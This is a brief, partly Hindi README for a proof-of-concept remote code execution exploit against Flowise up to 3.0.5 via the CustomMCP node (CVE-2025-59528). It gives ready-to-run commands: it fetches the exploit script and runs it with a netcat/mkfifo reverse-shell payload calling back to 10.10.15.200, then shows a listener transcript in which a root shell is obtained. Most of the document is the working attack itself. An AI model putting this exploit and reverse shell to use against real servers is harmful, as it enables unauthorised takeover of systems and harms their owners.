
Authenticated RCE PoC Flowise संस्करण <= 3.0.5 के लिए CustomMCP Node के माध्यम से (CVE-2025-59528)
Flowise संस्करण <= 3.0.5 के लिए प्रमाणित RCE PoC, CustomMCP Node (CVE-2025-59528) के माध्यम से
आधिकारिक GHSA का लिंक: https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p
रिवर्स शेल के लिए उदाहरण उपयोग:
curl -sSLO 'https://raw.githubusercontent.com/corey-farley/CVE-2025-59528-Flowise-RCE/main/CVE-2025-59528.py'
chmod +x CVE-2025-59528.py
./CVE-2025-59528.py -t 'http://target.com' -k 'API_KEY' -cmd 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.15.200 443 >/tmp/f'
लिसनर की जाँच करें और यह काम करना चाहिए:
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.15.200] from (UNKNOWN) [10.129.64.221] 43393
sh: can't access tty; job control turned off
/ # whoami
root